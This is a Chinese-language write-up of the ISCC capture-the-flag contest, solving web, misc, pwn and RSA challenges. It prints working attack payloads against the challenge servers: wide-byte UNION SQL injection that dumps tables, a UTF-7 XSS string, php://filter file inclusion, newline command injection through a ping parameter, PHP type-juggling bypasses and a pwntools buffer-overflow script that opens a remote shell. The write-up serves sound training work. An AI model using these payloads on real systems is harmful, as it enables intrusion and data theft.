ISCC-writeup

web

数字比他大就行

修改一下长度限制即可
http://lab1.xseclab.com/base10_0b4e4866096913ac9c3a2272dde27215/index.php
web1

本地的诱惑

http://118.190.152.202:8013/
XFF直接右键源代码看到flag
web2

web02

http://118.190.152.202:8004/
修改一下http请求头

1
client-ip:127.0.0.1

web3

Please give me username and password!

根据提示提交get请求usernamepassword,得到index.php.txt文件,源码如下:
http://118.190.152.202:8017/index.php.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
error_reporting(0);
$flag = "***********";
if(isset($_GET['username'])){
if (0 == strcasecmp($flag,$_GET['username'])){
$a = fla;
echo "very good!Username is right";
}
else{
print 'Username is not right<!--index.php.txt-->';}
}else
print 'Please give me username or password!';
if (isset($_GET['password'])){
if (is_numeric($_GET['password'])){
if (strlen($_GET['password']) < 4){
if ($_GET['password'] > 999){
$b = g;
print '<p>very good!Password is right</p>';
}else
print '<p>Password too little</p>';
}else
print '<p>Password too long</p>';
}else
print '<p>Password is not numeric</p>';
}
if ($a.$b == "flag")
print $flag;
?>

这里利用了php弱类型,还使用了科学计数法绕过password的限制
payload为

1
?username[]=12345&password=9e9

web4

##SQL注入的艺术
http://118.190.152.202:8015/index.php?id=1%df%27%23
查看源码编码方式,猜测是宽字节注入,测试了一下得到注入点
web5-1

1
http://118.190.152.202:8015/index.php?id=1%df%27

查看列数

1
http://118.190.152.202:8015/index.php?id=1%df%27 order by 9--+

查看数据库

1
http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(schema_name),3,4,5,6,7,8 from information_schema.schemata--+

web5-2
查看表名

1
http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--+

web5-3
查看字段

1
http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_schema=database()--+

web5-4
查看flag值

1
http://118.190.152.202:8015/index.php?id=-1%df%27 union select 1,group_concat(flag),3,4,5,6,7,8 from admins--+

web5-5

你能跨过去吗?

http://118.190.152.202:8010/
web6

1
http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&_=1302746925413

utf-7编码解一下得到
http://web2hack.org/xssee/

1
http://www.test.com/NodeMore.jsp?id=672613&page=2&pageCounter=32&undefined&callback=+/v+ <script>alert("key:/%nsfocusXSStest%/")</script>-&_=1302746925413

将得到的key提交过去得到flag
web6-1

一切都是套路

http://118.190.152.202:8009/index.php
这里是源码泄露index.php.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

include "flag.php";

if ($_SERVER["REQUEST_METHOD"] != "POST")
die("flag is here");

if (!isset($_POST["flag"]) )
die($_403);

foreach ($_GET as $k => $v){
$$k = $$v;
}

foreach ($_POST as $k => $v){
$$k = $v;
}

if ( $_POST["flag"] !== $flag )
die($_403);

echo "flag: ". $flag . "\n";
die($_200);

?>

这应该是php的变量覆盖,百度了一下相关的知识
参考了http://www.freebuf.com/column/150731.html
payload:

1
2
post: flag=笨死了笨死了
get: _200=flag

web7

你能绕过吗?

http://118.190.152.202:8008/index.php?f=articles&id=1
观察这个url发现可能存在文件包含,这里参考一下moctf的一道文件包含
构造payload

1
http://118.190.152.202:8008/index.php?f=index.php

发现提示error,这里应该是做了过滤,我们可以使用base64编码来绕过
payload

1
http://118.190.152.202:8008/index.php?f=php://filter/read=convert.base64-encode/resource=index.php

发现还是error,应该还过滤了什么,经过一番测试,构造出最终的payload

1
http://118.190.152.202:8008/index.php?f=PHP://filter/read=convert.base64-encode/resource=index&id=1

页面回显,base64解码后的得到

1
2
3
4
5
6
7
8
9
10
11
<?php
#ISCC{LFIOOOOOOOOOOOOOO}
if(isset($_GET['f'])){
if(strpos($_GET['f'],"php") !== False){
die("error...");
}
else{
include($_GET['f'] . '.php');
}
}
?>

请ping我的ip 看你能Ping通吗?

http://118.190.152.202:8018/
之前也有做过类似的题目,通过ping命令执行其他命令,我们先来列一下目录,发现能够查看到目录
payload:

1
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0als

web8

1
http://118.190.152.202:8018/index.php?ip=127.0.0.1%0acat flag.txt

web8-1

试试看(一知半解)

http://118.190.152.202:8006/
查看一下源代码发现

1
<img src="show.php?img=1.jpg">

利用php伪协议
payload:

1
view-source:http://118.190.152.202:8006/show.php?img=php://filter/resource=1.jpgresource=../flag.php

flag:

1
<!-- flag{1ntere5ting_PHP_Regu1ar_express1onssssss} -->

misc

What is that?

png像素隐写,修改一下高度得到flag
misc1

秘密电报

一看应该是培根密码

1
ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA

手动解一下

1
2
3
4
5
6
7
8
9
ABAAA  I
ABABB L
ABAAA I
ABABA K
AABAA E
ABAAA I
BAABA S
AAABA C
AAABA C

flag:ILIKEISCC

重重谍影(yingingying)

首先是解多次base64,解的过程注意%3D替换成=,不能继续解的时候观察字符串,去掉url编码,然后进行AES解密,最后使用与佛论禅解密得到flag:
AES解密传送门
flag:把我复制走

Where is the FLAG?

用winhex打开看到如下内容
ISCC
下载相应的软件打开附件,图层是一张二维码(分为8小块),通过拼接得到flag
IQR

凯撒十三世

1
凯撒十三世在学会使用键盘后,向你扔了一串字符:“ebdgc697g95w3”,猜猜它吧。

rot13(凯撒十三世)—>roqtp697t95j3
又提示键盘密码,对照键盘向下移一位得到flag

roqtp697t95j3
flag yougotme

一只猫的心思

图片中提取出一段文字(发现doc文件头),然后各种base转换和str转换

1
如是我闻:名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通

与佛论禅解密

1
523156615245644E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C564A54544A46

hex转str

1
R1VaREdNSlVHVTNVQ05KU0dRMlRNTkJVSVUyVEdOU0RHWTJESU9CVkdJMlRNTlpRR1UyVEtOSlRHQVpUS05DREdVWkRHTUJXR1EyVUNOQ0ZHUTNES01SVkdBMlRJTkpXRzRZREtOWlZHTTJUTU5TQ0c0NFRLTVJVR1kyRUtOQ0ZHVTNUTVFaVklFMkRRTkpYR1UzRE9NQlZHVTJUSU5KVkdNWVRNTUpWR1kzRUVOU0RHVkFUSVJCV0lNMlRNTkJVR1UyRE1RUlVJVTJEUU5KU0dNWVRPTUJVR00yVE1OQlZHWTJES01CVkdFM0VHTktCR1JBVEtOWlZHUTJFQ05CVkdVMkRHTUJUR0UzRENOSldHUTJUTU5CVkdZMkVJTlNDR1VaRElRWlZHUTJUS05DQkdVMlRLTVJUR0EyRE1OUlJHVTNESU5KVUlVMkVNTkpSR01ZREtRSlVIQTJUTU5KVUdSQVRJTVJWR0EyVElNWlFHTTRUS01CVkdFWlVJTTJF

base64

1
GUZDGMJUGU3UCNJSGQ2TMNBUIU2TGNSDGY2DIOBVGI2TMNZQGU2TKNJTGAZTKNCDGUZDGMBWGQ2UCNCFGQ3DKMRVGA2TINJWG4YDKNZVGM2TMNSCG44TKMRUGY2EKNCFGU3TMQZVIE2DQNJXGU3DOMBVGU2TINJVGMYTMMJVGY3EENSDGVATIRBWIM2TMNBUGU2DMQRUIU2DQNJSGMYTOMBUGM2TMNBVGY2DKMBVGE3EGNKBGRATKNZVGQ2ECNBVGU2DGMBTGE3DCNJWGQ2TMNBVGY2EINSCGUZDIQZVGQ2TKNCBGU2TKMRTGA2DMNRRGU3DINJUIU2EMNJRGMYDKQJUHA2TMNJUGRATIMRVGA2TIMZQGM4TKMBVGEZUIM2E

base32

1
5231457A5245644E536C6448525670555530354C5230645A4E4652505456705753566B7952464E4E576C5A485756705554553161566B6C5A4D6C5644546B4E485231704356456450516C5A4A57544A4554303161564564564D6B524C54554A555230466156454E4F51305A4856544A425054303950513D3D

ASCII

1
R1EzREdNSldHRVpUU05LR0dZNFRPTVpWSVkyRFNNWlZHWVpUTU1aVklZMlVDTkNHR1pCVEdPQlZJWTJET01aVEdVMkRLTUJUR0FaVENOQ0ZHVTJBPT09PQ==

base64

1
GQ3DGMJWGEZTSNKGGY4TOMZVIY2DSMZVGYZTMMZVIY2UCNCGGZBTGOBVIY2DOMZTGU2DKMBTGAZTCNCFGU2A====

base32

1
463161395F69735F493563635F5A4F6C385F4733545030314E54

ASCII

1
F1a9_is_I5cc_ZOl8_G3TP01NT

暴力XX不可取

得到密文

1
vfppjrnerpbzvat

凯撒一下得到flag

1
isccwearecoming

pwn

python:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
#p = process('./pwn50')
p = remote('47.104.16.75',9000)

log.info(p.recvuntil(":"))
p.sendline("admin")

log.info(p.recvuntil(":"))
p.sendline("T6OBSh2i")

log.info(p.recvuntil(": "))
p.sendline("1")

log.info(p.recvuntil(": "))
p.sendline("/bin/sh")

log.info(p.recvuntil(": "))
payload = "\x00"*0x58 + p64(0x40084A) #mov edi,0x61100
p.sendline(payload)
log.info(p.recvuntil(": "))
p.sendline("3")

p.interactive()

flag{welcome_to_iscc}

re

RSA

1、使用openssl提取public.key,得到RSA的n和e

1
2
3
4
5
6
7
8
root@kali:~/Desktop# openssl rsa -in public.key -pubin -noout -text -modulus
Public-Key: (256 bit)
Modulus:
00:d9:9e:95:22:96:a6:d9:60:df:c2:50:4a:ba:54:
5b:94:42:d6:0a:7b:9e:93:0a:ff:45:1c:78:ec:55:
d5:55:eb
Exponent: 65537 (0x10001)
Modulus=D99E952296A6D960DFC2504ABA545B9442D60A7B9E930AFF451C78EC55D555EB

对n进行分解得到p和q

1
2
3
n=98432079271513130981267919056149161631892822707167177858831841699521774310891
p=302825536744096741518546212761194311477
q=325045504186436346209877301320131277983

python脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python2
# -*- coding:utf8 -*-

import gmpy
import rsa

def foo():
p=302825536744096741518546212761194311477
q=325045504186436346209877301320131277983
n=98432079271513130981267919056149161631892822707167177858831841699521774310891
e=65537
d=int(gmpy.invert(e,(p-1)*(q-1)))
private_key=rsa.PrivateKey(n,e,d,p,q)
with open('fujian/encrypted.message1','rb') as f:
print rsa.decrypt(f.read(),private_key).decode()
with open('fujian/encrypted.message2','rb') as f:
print rsa.decrypt(f.read(),private_key).decode()
with open('fujian/encrypted.message3','rb') as f:
print rsa.decrypt(f.read(),private_key).decode()
pass

if __name__ == '__main__':
foo()
print 'ok'

flag{3b6d3806-4b2b-11e7-95a0-000c29d7e93d}

My math is bad

flag{th3_Line@r_4lgebra_1s_d1fficult!}

------ 本文结束感谢您的阅读 ------
坚持记录生活,您的支持将鼓励我继续创作!